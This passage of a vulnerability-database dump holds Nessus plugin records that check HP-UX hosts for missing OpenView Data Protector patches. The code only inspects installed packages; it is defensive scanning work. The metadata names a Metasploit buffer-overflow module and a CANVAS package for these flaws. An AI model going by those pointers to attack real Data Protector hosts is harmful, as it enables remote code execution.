Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_36799 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36799\", \"PHSS_37827\", \"PHSS_38726\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. 
These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36589.NASL", "href": "https://www.tenable.com/plugins/nessus/43135", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36589 : s700_800 11.X OV DP6.00 IA-64 patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36589. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43135);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36589 : s700_800 11.X OV DP6.00 IA-64 patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. 
The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36589 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_36589 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36589\", \"PHSS_37302\", \"PHSS_37821\", \"PHSS_38405\", \"PHSS_39106\", \"PHSS_39794\", \"PHSS_40171\", \"PHSS_40567\", \"PHSS_41264\", \"PHSS_41869\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 
and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_37383.NASL", "href": "https://www.tenable.com/plugins/nessus/43141", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_37383 : s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_37383. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43141);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_37383 : s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data 
Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_37383 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_37383 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_37383\", \"PHSS_38723\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-FRA-LS-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-JPN-LS-P\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is 
affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36622.NASL", "href": "https://www.tenable.com/plugins/nessus/43136", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36622 : s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36622. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43136);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36622 : s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 
PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36622 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_36622 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36622\", \"PHSS_37173\", \"PHSS_37816\", \"PHSS_38402\", \"PHSS_38741\", \"PHSS_38943\", \"PHSS_39015\", \"PHSS_39730\", \"PHSS_40079\", \"PHSS_40562\", \"PHSS_41261\", \"PHSS_41866\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.06.00\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 PA-RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36588.NASL", "href": "https://www.tenable.com/plugins/nessus/43134", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36588 : s700_800 11.X OV DP6.00 PA-RISC patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36588. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43134);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36588 : s700_800 11.X OV DP6.00 PA-RISC patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 PA-RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. 
The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36588 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security 
Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_36588 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36588\", \"PHSS_37301\", \"PHSS_37820\", \"PHSS_38404\", \"PHSS_39105\", \"PHSS_39793\", \"PHSS_40170\", \"PHSS_40566\", \"PHSS_41263\", \"PHSS_41868\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. 
The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_37382.NASL", "href": "https://www.tenable.com/plugins/nessus/43140", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_37382 : s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_37382. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43140);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_37382 : s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. 
These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_37382 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n 